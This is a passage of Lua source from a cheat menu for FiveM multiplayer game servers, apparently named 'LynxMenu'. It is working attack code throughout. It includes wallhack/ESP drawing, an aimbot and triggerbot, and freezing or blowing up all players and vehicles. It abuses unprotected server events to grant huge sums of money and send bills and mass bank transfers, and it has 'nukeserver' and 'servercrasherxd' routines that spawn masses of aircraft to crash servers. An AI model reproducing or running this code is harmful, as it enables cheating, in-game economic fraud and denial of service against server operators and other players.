  6551. SetVehicleDoorBroken(ay, 6, true)
  6552. SetVehicleDoorBroken(ay, 7, true)
  6553. SetVehicleLights(ay, 1)
  6554. Citizen.InvokeNative(0x1FD09E7390A74D54, ay, 1)
  6555. SetVehicleNumberPlateTextIndex(ay, 5)
  6556. SetVehicleNumberPlateText(ay, 'LynxMenu')
  6557. SetVehicleDirtLevel(ay, 10.0)
  6558. SetVehicleModColor_1(ay, 1)
  6559. SetVehicleModColor_2(ay, 1)
  6560. SetVehicleCustomPrimaryColour(ay, 255, 51, 255)
  6561. SetVehicleCustomSecondaryColour(ay, 255, 51, 255)
  6562. SetVehicleBurnout(ay, true)
  6563. end
  6564. end
  6565. end
  6566. if destroyvehicles then
  6567. for vehicle in EnumerateVehicles() do
  6568. if vehicle ~= GetVehiclePedIsIn(GetPlayerPed(-1), false) then
  6569. NetworkRequestControlOfEntity(vehicle)
  6570. SetVehicleUndriveable(vehicle, true)
  6571. SetVehicleEngineHealth(vehicle, 0)
  6572. end
  6573. end
  6574. end
  6575. if explodevehicles then
  6576. for vehicle in EnumerateVehicles() do
  6577. if vehicle ~= GetVehiclePedIsIn(GetPlayerPed(-1), false) then
  6578. NetworkRequestControlOfEntity(vehicle)
  6579. NetworkExplodeVehicle(vehicle, true, true, false)
  6580. end
  6581. end
  6582. end
  6583. if huntspam then
  6584. Citizen.Wait(1)
  6585. TriggerServerEvent('esx-qalle-hunting:reward', 20000)
  6586. TriggerServerEvent('esx-qalle-hunting:sell')
  6587. end
  6588. if deletenearestvehicle then
  6589. for vehicle in EnumerateVehicles() do
  6590. if vehicle ~= GetVehiclePedIsIn(GetPlayerPed(-1), false) then
  6591. SetEntityAsMissionEntity(GetVehiclePedIsIn(vehicle, true), 1, 1)
  6592. DeleteEntity(GetVehiclePedIsIn(vehicle, true))
  6593. SetEntityAsMissionEntity(vehicle, 1, 1)
  6594. DeleteEntity(vehicle)
  6595. end
  6596. end
  6597. end
  6598. if freezeplayer then
  6599. ClearPedTasksImmediately(GetPlayerPed(SelectedPlayer))
  6600. end
  6601. if freezeall then
  6602. for i = 0, 128 do
  6603. ClearPedTasksImmediately(GetPlayerPed(i))
  6604. end
  6605. end
  6606. if aimtest then
  6607. if IsPlayerFreeAiming(PlayerId()) then
  6608. local TargetPed = getEntity(PlayerId())
  6609. local TargetPos = GetEntityCoords(TargetPed)
  6610. local Exist = DoesEntityExist(TargetPed)
  6611. local Dead = IsPlayerDead(TargetPed)
  6613. if Exist and not Dead and IsEntityAPed(TargetPed) then
  6614. local OnScreen, ScreenX, ScreenY = World3dToScreen2d(TargetPos.x, TargetPos.y, TargetPos.z, 0)
  6615. if IsEntityVisible(TargetPed) and OnScreen then
  6616. if HasEntityClearLosToEntity(PlayerPedId(), TargetPed, 100000) then
  6617. local TargetCoords = GetPedBoneCoords(TargetPed, 31086, 0, 0, 0)
  6618. SetPedShootsAtCoord(PlayerPedId(), TargetCoords.x, TargetCoords.y, TargetCoords.z, 1)
  6619. SetPedShootsAtCoord(PlayerPedId(), TargetCoords.x, TargetCoords.y, TargetCoords.z, 1)
  6620. end
  6621. end
  6622. end
  6623. end
  6624. end
  6625. if esp then
  6626. for i = 0, 128 do
  6627. if i ~= PlayerId(-1) and GetPlayerServerId(i) ~= 0 then
  6628. local a8 = k(1.0)
  6629. local d7 = GetPlayerPed(i)
  6630. local d8, d9, da = table.unpack(GetEntityCoords(PlayerPedId(-1)))
  6631. local x, y, z = table.unpack(GetEntityCoords(d7))
  6632. local db =
  6633. '~h~Name: ' ..
  6634. GetPlayerName(i) ..
  6635. '\nServer ID: ' ..
  6636. GetPlayerServerId(i) ..
  6637. '\nPlayer ID: ' ..
  6638. i ..
  6639. '\nDist: ' ..
  6640. math.round(GetDistanceBetweenCoords(d8, d9, da, x, y, z, true), 1)
  6641. if IsPedInAnyVehicle(d7, true) then
  6642. local dc =
  6643. GetLabelText(GetDisplayNameFromVehicleModel(GetEntityModel(GetVehiclePedIsUsing(d7))))
  6644. db = db .. '\nVeh: ' .. dc
  6645. end
  6646. if espinfo and esp then
  6647. DrawText3D(x, y, z - 1.0, db, a8.r, a8.g, a8.b)
  6648. end
  6649. if espbox and esp then
  6650. LineOneBegin = GetOffsetFromEntityInWorldCoords(d7, -0.3, -0.3, -0.9)
  6651. LineOneEnd = GetOffsetFromEntityInWorldCoords(d7, 0.3, -0.3, -0.9)
  6652. LineTwoBegin = GetOffsetFromEntityInWorldCoords(d7, 0.3, -0.3, -0.9)
  6653. LineTwoEnd = GetOffsetFromEntityInWorldCoords(d7, 0.3, 0.3, -0.9)
  6654. LineThreeBegin = GetOffsetFromEntityInWorldCoords(d7, 0.3, 0.3, -0.9)
  6655. LineThreeEnd = GetOffsetFromEntityInWorldCoords(d7, -0.3, 0.3, -0.9)
  6656. LineFourBegin = GetOffsetFromEntityInWorldCoords(d7, -0.3, -0.3, -0.9)
  6657. TLineOneBegin = GetOffsetFromEntityInWorldCoords(d7, -0.3, -0.3, 0.8)
  6658. TLineOneEnd = GetOffsetFromEntityInWorldCoords(d7, 0.3, -0.3, 0.8)
  6659. TLineTwoBegin = GetOffsetFromEntityInWorldCoords(d7, 0.3, -0.3, 0.8)
  6660. TLineTwoEnd = GetOffsetFromEntityInWorldCoords(d7, 0.3, 0.3, 0.8)
  6661. TLineThreeBegin = GetOffsetFromEntityInWorldCoords(d7, 0.3, 0.3, 0.8)
  6662. TLineThreeEnd = GetOffsetFromEntityInWorldCoords(d7, -0.3, 0.3, 0.8)
  6663. TLineFourBegin = GetOffsetFromEntityInWorldCoords(d7, -0.3, -0.3, 0.8)
  6664. ConnectorOneBegin = GetOffsetFromEntityInWorldCoords(d7, -0.3, 0.3, 0.8)
  6665. ConnectorOneEnd = GetOffsetFromEntityInWorldCoords(d7, -0.3, 0.3, -0.9)
  6666. ConnectorTwoBegin = GetOffsetFromEntityInWorldCoords(d7, 0.3, 0.3, 0.8)
  6667. ConnectorTwoEnd = GetOffsetFromEntityInWorldCoords(d7, 0.3, 0.3, -0.9)
  6668. ConnectorThreeBegin = GetOffsetFromEntityInWorldCoords(d7, -0.3, -0.3, 0.8)
  6669. ConnectorThreeEnd = GetOffsetFromEntityInWorldCoords(d7, -0.3, -0.3, -0.9)
  6670. ConnectorFourBegin = GetOffsetFromEntityInWorldCoords(d7, 0.3, -0.3, 0.8)
  6671. ConnectorFourEnd = GetOffsetFromEntityInWorldCoords(d7, 0.3, -0.3, -0.9)
  6672. DrawLine(
  6673. LineOneBegin.x,
  6674. LineOneBegin.y,
  6675. LineOneBegin.z,
  6676. LineOneEnd.x,
  6677. LineOneEnd.y,
  6678. LineOneEnd.z,
  6679. a8.r,
  6680. a8.g,
  6681. a8.b,
  6682. 255
  6683. )
  6684. DrawLine(
  6685. LineTwoBegin.x,
  6686. LineTwoBegin.y,
  6687. LineTwoBegin.z,
  6688. LineTwoEnd.x,
  6689. LineTwoEnd.y,
  6690. LineTwoEnd.z,
  6691. a8.r,
  6692. a8.g,
  6693. a8.b,
  6694. 255
  6695. )
  6696. DrawLine(
  6697. LineThreeBegin.x,
  6698. LineThreeBegin.y,
  6699. LineThreeBegin.z,
  6700. LineThreeEnd.x,
  6701. LineThreeEnd.y,
  6702. LineThreeEnd.z,
  6703. a8.r,
  6704. a8.g,
  6705. a8.b,
  6706. 255
  6707. )
  6708. DrawLine(
  6709. LineThreeEnd.x,
  6710. LineThreeEnd.y,
  6711. LineThreeEnd.z,
  6712. LineFourBegin.x,
  6713. LineFourBegin.y,
  6714. LineFourBegin.z,
  6715. a8.r,
  6716. a8.g,
  6717. a8.b,
  6718. 255
  6719. )
  6720. DrawLine(
  6721. TLineOneBegin.x,
  6722. TLineOneBegin.y,
  6723. TLineOneBegin.z,
  6724. TLineOneEnd.x,
  6725. TLineOneEnd.y,
  6726. TLineOneEnd.z,
  6727. a8.r,
  6728. a8.g,
  6729. a8.b,
  6730. 255
  6731. )
  6732. DrawLine(
  6733. TLineTwoBegin.x,
  6734. TLineTwoBegin.y,
  6735. TLineTwoBegin.z,
  6736. TLineTwoEnd.x,
  6737. TLineTwoEnd.y,
  6738. TLineTwoEnd.z,
  6739. a8.r,
  6740. a8.g,
  6741. a8.b,
  6742. 255
  6743. )
  6744. DrawLine(
  6745. TLineThreeBegin.x,
  6746. TLineThreeBegin.y,
  6747. TLineThreeBegin.z,
  6748. TLineThreeEnd.x,
  6749. TLineThreeEnd.y,
  6750. TLineThreeEnd.z,
  6751. a8.r,
  6752. a8.g,
  6753. a8.b,
  6754. 255
  6755. )
  6756. DrawLine(
  6757. TLineThreeEnd.x,
  6758. TLineThreeEnd.y,
  6759. TLineThreeEnd.z,
  6760. TLineFourBegin.x,
  6761. TLineFourBegin.y,
  6762. TLineFourBegin.z,
  6763. a8.r,
  6764. a8.g,
  6765. a8.b,
  6766. 255
  6767. )
  6768. DrawLine(
  6769. ConnectorOneBegin.x,
  6770. ConnectorOneBegin.y,
  6771. ConnectorOneBegin.z,
  6772. ConnectorOneEnd.x,
  6773. ConnectorOneEnd.y,
  6774. ConnectorOneEnd.z,
  6775. a8.r,
  6776. a8.g,
  6777. a8.b,
  6778. 255
  6779. )
  6780. DrawLine(
  6781. ConnectorTwoBegin.x,
  6782. ConnectorTwoBegin.y,
  6783. ConnectorTwoBegin.z,
  6784. ConnectorTwoEnd.x,
  6785. ConnectorTwoEnd.y,
  6786. ConnectorTwoEnd.z,
  6787. a8.r,
  6788. a8.g,
  6789. a8.b,
  6790. 255
  6791. )
  6792. DrawLine(
  6793. ConnectorThreeBegin.x,
  6794. ConnectorThreeBegin.y,
  6795. ConnectorThreeBegin.z,
  6796. ConnectorThreeEnd.x,
  6797. ConnectorThreeEnd.y,
  6798. ConnectorThreeEnd.z,
  6799. a8.r,
  6800. a8.g,
  6801. a8.b,
  6802. 255
  6803. )
  6804. DrawLine(
  6805. ConnectorFourBegin.x,
  6806. ConnectorFourBegin.y,
  6807. ConnectorFourBegin.z,
  6808. ConnectorFourEnd.x,
  6809. ConnectorFourEnd.y,
  6810. ConnectorFourEnd.z,
  6811. a8.r,
  6812. a8.g,
  6813. a8.b,
  6814. 255
  6815. )
  6816. end
  6817. if esplines and esp then
  6818. DrawLine(d8, d9, da, x, y, z, a8.r, a8.g, a8.b, 255)
  6819. end
  6820. end
  6821. end
  6822. end
  6823. if VehGod and IsPedInAnyVehicle(PlayerPedId(-1), true) then
  6824. SetEntityInvincible(GetVehiclePedIsUsing(PlayerPedId(-1)), true)
  6825. end
  6826. if oneshot then
  6827. SetPlayerWeaponDamageModifier(PlayerId(-1), 100.0)
  6828. local dd = getEntity(PlayerId(-1))
  6829. if IsEntityAPed(dd) then
  6830. if IsPedInAnyVehicle(dd, true) then
  6831. if IsPedInAnyVehicle(GetPlayerPed(-1), true) then
  6832. if IsControlJustReleased(1, 69) then
  6833. NetworkExplodeVehicle(GetVehiclePedIsIn(dd, true), true, true, 0)
  6834. end
  6835. else
  6836. if IsControlJustReleased(1, 142) then
  6837. NetworkExplodeVehicle(GetVehiclePedIsIn(dd, true), true, true, 0)
  6838. end
  6839. end
  6840. end
  6841. end
  6842. else
  6843. SetPlayerWeaponDamageModifier(PlayerId(-1), 1.0)
  6844. end
  6845. if rainbowf then
  6846. for i = 1, 7 do
  6847. Citizen.Wait(100)
  6848. SetPedWeaponTintIndex(GetPlayerPed(-1), 1198879012, i)
  6849. i = i + 1
  6850. if i == 7 then
  6851. i = 1
  6852. end
  6853. end
  6854. end
  6855. if BlowDrugsUp then
  6856. Citizen.CreateThread(
  6857. function()
  6858. TriggerServerEvent('esx_drugs:startHarvestWeed')
  6859. TriggerServerEvent('esx_drugs:startHarvestCoke')
  6860. TriggerServerEvent('esx_drugs:startHarvestMeth')
  6861. TriggerServerEvent('esx_drugs:startTransformOpium')
  6862. TriggerServerEvent('esx_drugs:startTransformWeed')
  6863. TriggerServerEvent('esx_drugs:startTransformCoke')
  6864. TriggerServerEvent('esx_drugs:startTransformMeth')
  6865. TriggerServerEvent('esx_drugs:startTransformOpium')
  6866. TriggerServerEvent('esx_drugs:startSellWeed')
  6867. TriggerServerEvent('esx_drugs:startSellCoke')
  6868. TriggerServerEvent('esx_drugs:startSellMeth')
  6869. TriggerServerEvent('esx_drugs:startSellOpium')
  6870. Citizen.Wait(1000)
  6871. end
  6872. )
  6873. end
  6874. if blowall then
  6876. for i = 0, 128 do
  6877. Citizen.Wait(500)
  6878. AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 3000.0, true, false, 100000.0)
  6879. AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 3000.0, true, false, true)
  6880. end
  6881. end
  6882. if crosshair then
  6883. ShowHudComponentThisFrame(14)
  6884. end
  6885. if crosshairc then
  6886. bz('~r~+', 0.495, 0.484)
  6887. end
  6888. if crosshairc2 then
  6889. bz('~r~.', 0.4968, 0.478)
  6890. end
  6891. if cN then
  6892. local de = false
  6893. local df = 130
  6894. local dg = 0
  6895. for f = 0, 128 do
  6896. if NetworkIsPlayerActive(f) and GetPlayerPed(f) ~= GetPlayerPed(-1) then
  6897. ped = GetPlayerPed(f)
  6898. blip = GetBlipFromEntity(ped)
  6899. x1, y1, z1 = table.unpack(GetEntityCoords(GetPlayerPed(-1), true))
  6900. x2, y2, z2 = table.unpack(GetEntityCoords(GetPlayerPed(f), true))
  6901. distance = math.floor(GetDistanceBetweenCoords(x1, y1, z1, x2, y2, z2, true))
  6902. if de then
  6903. if NetworkIsPlayerTalking(f) then
  6904. local dh = k(1.0)
  6905. DrawText3D(
  6906. x2,
  6907. y2,
  6908. z2 + 1.2,
  6909. GetPlayerServerId(f) .. ' | ' .. GetPlayerName(f),
  6910. dh.r,
  6911. dh.g,
  6912. dh.b
  6913. )
  6914. else
  6915. DrawText3D(
  6916. x2,
  6917. y2,
  6918. z2 + 1.2,
  6919. GetPlayerServerId(f) .. ' | ' .. GetPlayerName(f),
  6920. 255,
  6921. 255,
  6922. 255
  6923. )
  6924. end
  6925. end
  6926. if distance < df then
  6927. if not de then
  6928. if NetworkIsPlayerTalking(f) then
  6929. local dh = k(1.0)
  6930. DrawText3D(
  6931. x2,
  6932. y2,
  6933. z2 + 1.2,
  6934. GetPlayerServerId(f) .. ' | ' .. GetPlayerName(f),
  6935. dh.r,
  6936. dh.g,
  6937. dh.b
  6938. )
  6939. else
  6940. DrawText3D(
  6941. x2,
  6942. y2,
  6943. z2 + 1.2,
  6944. GetPlayerServerId(f) .. ' | ' .. GetPlayerName(f),
  6945. 255,
  6946. 255,
  6947. 255
  6948. )
  6949. end
  6950. end
  6951. end
  6952. end
  6953. end
  6954. end
  6955. if showCoords then
  6956. x, y, z = table.unpack(GetEntityCoords(GetPlayerPed(-1), true))
  6957. roundx = tonumber(string.format('%.2f', x))
  6958. roundy = tonumber(string.format('%.2f', y))
  6959. roundz = tonumber(string.format('%.2f', z))
  6960. bz('~r~X:~s~ ' .. roundx, 0.05, 0.00)
  6961. bz('~r~ Y:~s~ ' .. roundy, 0.11, 0.00)
  6962. bz('~r~ Z:~s~ ' .. roundz, 0.17, 0.00)
  6963. end
  6965. function carthieftroll()
  6966. for i = 0, 128 do
  6967. local bK = GetEntityCoords(GetPlayerPed(i))
  6968. TriggerServerEvent('esx_carthief:alertcops', bK.x, bK.y, bK.z)
  6969. end
  6970. end
  6972. function automaticmoneyesx()
  6973. local m = KeyboardInput('Warning, this value can be multiplied!!!', '', 100)
  6974. if cO then
  6975. if m ~= '' then
  6976. local confirm = KeyboardInput('Are you sure? y/n', '', 0)
  6977. if confirm == 'y' then
  6978. end
  6979. av('~h~~g~Testing all ~y~ESX ~g~scripts~s~.', true)
  6980. TriggerServerEvent('esx_carthief:pay', m)
  6981. TriggerServerEvent('esx_jobs:caution', 'give_back', m)
  6982. TriggerServerEvent('esx_fueldelivery:pay', m)
  6983. TriggerServerEvent('esx_carthief:pay', m)
  6984. TriggerServerEvent('esx_godirtyjob:pay', m)
  6985. TriggerServerEvent('esx_pizza:pay', m)
  6986. TriggerServerEvent('esx_ranger:pay', m)
  6987. TriggerServerEvent('esx_garbagejob:pay', m)
  6988. TriggerServerEvent('esx_truckerjob:pay', m)
  6989. TriggerServerEvent('AdminMenu:giveBank', m)
  6990. TriggerServerEvent('AdminMenu:giveCash', m)
  6991. TriggerServerEvent('esx_gopostaljob:pay', m)
  6992. TriggerServerEvent('esx_banksecurity:pay', m)
  6993. TriggerServerEvent('esx_slotmachine:sv:2', m)
  6994. elseif confirm == 'n' then
  6995. av('~h~~b~Operation cancelled~s~.', false)
  6996. else
  6997. av('~h~~b~Invalid Confirmation~s~.', true)
  6998. av('~h~~b~Operation cancelled~s~.', false)
  6999. end
  7000. end
  7001. end
  7003. function vrpdestroy()
  7005. TriggerServerEvent(
  7006. 'lscustoms:payGarage',
  7007. {
  7008. costs = -99999999
  7009. }
  7010. )
  7011. TriggerServerEvent('vrp_slotmachine:server:2', 999999999)
  7012. TriggerServerEvent('Banca:deposit', 999999999)
  7013. TriggerServerEvent('bank:deposit', 999999999)
  7014. local di = GetPlayerServerId(PlayerId())
  7015. for i = 0, 128 do
  7016. TriggerEvent('bank:transfer', di, GetPlayerServerId(i), 99999999)
  7017. end
  7018. end
  7019. if bv then
  7020. esxdestroyv2()
  7021. nukeserver()
  7022. end
  7024. function esxdestroyv2()
  7025. Citizen.CreateThread(
  7026. function()
  7027. TriggerServerEvent('esx_jobs:caution', 'give_back', 9999999999)
  7028. TriggerServerEvent('esx_fueldelivery:pay', 9999999999)
  7029. TriggerServerEvent('esx_carthief:pay', 9999999999)
  7030. TriggerServerEvent('esx_godirtyjob:pay', 9999999999)
  7031. TriggerServerEvent('esx_pizza:pay', 9999999999)
  7032. TriggerServerEvent('esx_ranger:pay', 9999999999)
  7033. TriggerServerEvent('esx_garbagejob:pay', 9999999999)
  7034. TriggerServerEvent('esx_truckerjob:pay', 9999999999)
  7035. TriggerServerEvent('AdminMenu:giveBank', 9999999999)
  7036. TriggerServerEvent('AdminMenu:giveCash', 9999999999)
  7037. TriggerServerEvent('esx_gopostaljob:pay', 9999999999)
  7038. TriggerServerEvent('esx_banksecurity:pay', 9999999999)
  7039. TriggerServerEvent('esx_slotmachine:sv:2', 9999999999)
  7042. for i = 0, 128 do
  7043. TriggerServerEvent(
  7044. 'esx:giveInventoryItem',
  7045. GetPlayerServerId(i),
  7046. 'item_money',
  7047. 'money',
  7048. 1254756
  7049. )
  7050. TriggerServerEvent(
  7051. 'esx:giveInventoryItem',
  7052. GetPlayerServerId(i),
  7053. 'item_money',
  7054. 'money',
  7055. 1254756
  7056. )
  7057. TriggerServerEvent(
  7058. 'esx_billing:sendBill',
  7059. GetPlayerServerId(i),
  7060. 'Purposeless',
  7061. 43161337
  7062. )
  7063. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(i), 'police', 3)
  7064. TriggerServerEvent('NB:recruterplayer', i, 'police', 3)
  7065. end
  7066. end
  7067. )
  7068. end
  7070. function giveeveryone()
  7071. Citizen.CreateThread(
  7072. function()
  7073. TriggerServerEvent('esx_jobs:caution', 'give_back', 9999999999)
  7074. TriggerServerEvent('esx_fueldelivery:pay', 9999999999)
  7075. TriggerServerEvent('esx_carthief:pay', 9999999999)
  7076. TriggerServerEvent('esx_godirtyjob:pay', 9999999999)
  7077. TriggerServerEvent('esx_pizza:pay', 9999999999)
  7078. TriggerServerEvent('esx_ranger:pay', 9999999999)
  7079. TriggerServerEvent('esx_garbagejob:pay', 9999999999)
  7080. TriggerServerEvent('esx_truckerjob:pay', 9999999999)
  7081. TriggerServerEvent('AdminMenu:giveBank', 9999999999)
  7082. TriggerServerEvent('AdminMenu:giveCash', 9999999999)
  7083. TriggerServerEvent('esx_gopostaljob:pay', 9999999999)
  7084. TriggerServerEvent('esx_banksecurity:pay', 9999999999)
  7085. TriggerServerEvent('esx_slotmachine:sv:2', 9999999999)
  7086. for i = 0, 128 do
  7087. TriggerServerEvent(
  7088. 'esx:giveInventoryItem',
  7089. GetPlayerServerId(i),
  7090. 'item_money',
  7091. 'money',
  7092. 125475600
  7093. )
  7094. TriggerServerEvent(
  7095. 'esx:giveInventoryItem',
  7096. GetPlayerServerId(i),
  7097. 'item_money',
  7098. 'money',
  7099. 125475600
  7100. )
  7101. end
  7102. end
  7103. )
  7104. end
  7106. function nukeserver()
  7107. Citizen.CreateThread(
  7108. function()
  7109. local dj = 'Avenger'
  7110. local dk = 'CARGOPLANE'
  7111. local dl = 'luxor'
  7112. local dm = 'maverick'
  7113. local dn = 'blimp2'
  7114. while not HasModelLoaded(GetHashKey(dk)) do
  7115. Citizen.Wait(0)
  7116. RequestModel(GetHashKey(dk))
  7117. end
  7118. while not HasModelLoaded(GetHashKey(dl)) do
  7119. Citizen.Wait(0)
  7120. RequestModel(GetHashKey(dl))
  7121. end
  7122. while not HasModelLoaded(GetHashKey(dj)) do
  7123. Citizen.Wait(0)
  7124. RequestModel(GetHashKey(dj))
  7125. end
  7126. while not HasModelLoaded(GetHashKey(dm)) do
  7127. Citizen.Wait(0)
  7128. RequestModel(GetHashKey(dm))
  7129. end
  7130. while not HasModelLoaded(GetHashKey(dn)) do
  7131. Citizen.Wait(0)
  7132. RequestModel(GetHashKey(dn))
  7133. end
  7135. for i = 0, 128 do
  7136. local dl =
  7137. CreateVehicle(GetHashKey(dj), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
  7138. CreateVehicle(GetHashKey(dj), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
  7139. CreateVehicle(GetHashKey(dj), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
  7140. CreateVehicle(GetHashKey(dk), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
  7141. CreateVehicle(GetHashKey(dk), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
  7142. CreateVehicle(GetHashKey(dk), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
  7143. CreateVehicle(GetHashKey(dl), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
  7144. CreateVehicle(GetHashKey(dl), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
  7145. CreateVehicle(GetHashKey(dl), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
  7146. CreateVehicle(GetHashKey(dm), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
  7147. CreateVehicle(GetHashKey(dm), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
  7148. CreateVehicle(GetHashKey(dm), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
  7149. CreateVehicle(GetHashKey(dn), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
  7150. CreateVehicle(GetHashKey(dn), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
  7151. CreateVehicle(GetHashKey(dn), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
  7152. AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 3000.0, true, false, 100000.0) and
  7153. AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 3000.0, true, false, true)
  7154. end
  7155. end
  7156. )
  7157. end
  7158. if servercrasherxd then
  7159. Citizen.CreateThread(
  7160. function()
  7161. local dj = 'Avenger'
  7162. local dk = 'CARGOPLANE'
  7163. local dl = 'luxor'
  7164. local dm = 'maverick'
  7165. local dn = 'blimp2'
  7166. while not HasModelLoaded(GetHashKey(dk)) do
  7167. Citizen.Wait(0)
  7168. RequestModel(GetHashKey(dk))
  7169. end
  7170. while not HasModelLoaded(GetHashKey(dl)) do
  7171. Citizen.Wait(0)
  7172. RequestModel(GetHashKey(dl))
  7173. end
  7174. while not HasModelLoaded(GetHashKey(dj)) do
  7175. Citizen.Wait(0)
  7176. RequestModel(GetHashKey(dj))
  7177. end
  7178. while not HasModelLoaded(GetHashKey(dm)) do
  7179. Citizen.Wait(0)
  7180. RequestModel(GetHashKey(dm))
  7181. end
  7182. while not HasModelLoaded(GetHashKey(dn)) do
  7183. Citizen.Wait(0)
  7184. RequestModel(GetHashKey(dn))
  7185. end
  7186. for i = 0, 128 do
  7187. for ak = 100, 150 do
  7188. local dl =
  7189. CreateVehicle(GetHashKey(dj), GetEntityCoords(GetPlayerPed(i)) - ak, true, true) and
  7190. CreateVehicle(GetHashKey(dj), GetEntityCoords(GetPlayerPed(i)) - ak, true, true) and
  7191. CreateVehicle(GetHashKey(dj), 2 * GetEntityCoords(GetPlayerPed(i)) + ak, true, true) and
  7192. CreateVehicle(GetHashKey(dk), GetEntityCoords(GetPlayerPed(i)) - ak, true, true) and
  7193. CreateVehicle(GetHashKey(dk), GetEntityCoords(GetPlayerPed(i)) - ak, true, true) and
  7194. CreateVehicle(GetHashKey(dk), 2 * GetEntityCoords(GetPlayerPed(i)) - ak, true, true) and
  7195. CreateVehicle(GetHashKey(dl), GetEntityCoords(GetPlayerPed(i)) - ak, true, true) and
  7196. CreateVehicle(GetHashKey(dl), 2 * GetEntityCoords(GetPlayerPed(i)) + ak, true, true) and
  7197. CreateVehicle(GetHashKey(dm), GetEntityCoords(GetPlayerPed(i)) - ak, true, true) and
  7198. CreateVehicle(GetHashKey(dm), GetEntityCoords(GetPlayerPed(i)) - ak, true, true) and
  7199. CreateVehicle(GetHashKey(dm), 2 * GetEntityCoords(GetPlayerPed(i)) + ak, true, true) and
  7200. CreateVehicle(GetHashKey(dn), GetEntityCoords(GetPlayerPed(i)) - ak, true, true) and
  7201. CreateVehicle(GetHashKey(dn), GetEntityCoords(GetPlayerPed(i)) - ak, true, true) and
  7202. CreateVehicle(GetHashKey(dn), 2 * GetEntityCoords(GetPlayerPed(i)) + ak, true, true)
  7203. end
  7204. end
  7205. end
  7206. )
  7207. end
  7208. if VehSpeed and IsPedInAnyVehicle(PlayerPedId(-1), true) then
  7209. if IsControlPressed(0, 209) then
  7210. SetVehicleForwardSpeed(GetVehiclePedIsUsing(PlayerPedId(-1)), 100.0)
  7211. elseif IsControlPressed(0, 210) then
  7212. SetVehicleForwardSpeed(GetVehiclePedIsUsing(PlayerPedId(-1)), 0.0)
  7213. end
  7214. end
  7215. if TriggerBot then
  7216. local dp, Entity = GetEntityPlayerIsFreeAimingAt(PlayerId(-1), Entity)
  7217. if dp then
  7218. if IsEntityAPed(Entity) and not IsPedDeadOrDying(Entity, 0) and IsPedAPlayer(Entity) then
  7219. ShootPlayer(Entity)
  7220. end
  7221. end
  7222. end
  7223. DisplayRadar(true)
  7224. if RainbowVeh then
  7225. local dq = k(1.0)
  7226. SetVehicleCustomPrimaryColour(GetVehiclePedIsUsing(PlayerPedId(-1)), dq.r, dq.g, dq.b)
  7227. SetVehicleCustomSecondaryColour(GetVehiclePedIsUsing(PlayerPedId(-1)), dq.r, dq.g, dq.b)
  7228. end
  7229. if rainbowh then
  7230. for i = -1, 12 do
  7231. Citizen.Wait(100)
  7232. local a8 = k(1.0)
  7233. SetVehicleHeadlightsColour(GetVehiclePedIsUsing(PlayerPedId(-1)), i)
  7234. SetVehicleNeonLightsColour(GetVehiclePedIsUsing(PlayerPedId(-1)), a8.r, a8.g, a8.b)
  7235. if i == 12 then
  7236. i = -1
  7237. end
  7238. end
  7239. end
  7240. if t2x then
  7241. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 2.0 * 20.0)
  7242. end
  7243. if t4x then
  7244. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 4.0 * 20.0)
  7245. end
  7246. if t10x then
  7247. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 10.0 * 20.0)
  7248. end
  7249. if t16x then
  7250. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16.0 * 20.0)
  7251. end
  7252. if txd then
  7253. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 500.0 * 20.0)
  7254. end
  7255. if tbxd then
  7256. SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 9999.0 * 20.0)
  7257. end
  7258. if Noclip then
  7259. local dr = 2
  7260. local ds =
  7261. IsPedInAnyVehicle(PlayerPedId(-1), false) and GetVehiclePedIsUsing(PlayerPedId(-1)) or
  7262. PlayerPedId(-1)
  7263. FreezeEntityPosition(PlayerPedId(-1), true)
  7264. SetEntityInvincible(PlayerPedId(-1), true)
  7265. local dt = GetEntityCoords(entity)
  7266. DisableControlAction(0, 32, true)
  7267. DisableControlAction(0, 268, true)
  7268. DisableControlAction(0, 31, true)
  7269. DisableControlAction(0, 269, true)
  7270. DisableControlAction(0, 33, true)
  7271. DisableControlAction(0, 266, true)
  7272. DisableControlAction(0, 34, true)
  7273. DisableControlAction(0, 30, true)
  7274. DisableControlAction(0, 267, true)
  7275. DisableControlAction(0, 35, true)
  7276. DisableControlAction(0, 44, true)
  7277. DisableControlAction(0, 20, true)
  7278. local du = 0.0
  7279. local dv = 0.0
  7280. if GetInputMode() == 'MouseAndKeyboard' then
  7281. if IsDisabledControlPressed(0, 32) then
  7282. du = 0.5
  7283. end
  7284. if IsDisabledControlPressed(0, 33) then
  7285. du = -0.5
  7286. end
  7287. if IsDisabledControlPressed(0, 34) then
  7288. SetEntityHeading(PlayerPedId(-1), GetEntityHeading(PlayerPedId(-1)) + 3.0)
  7289. end
  7290. if IsDisabledControlPressed(0, 35) then
  7291. SetEntityHeading(PlayerPedId(-1), GetEntityHeading(PlayerPedId(-1)) - 3.0)
  7292. end
  7293. if IsDisabledControlPressed(0, 44) then
  7294. dv = 0.21
  7295. end
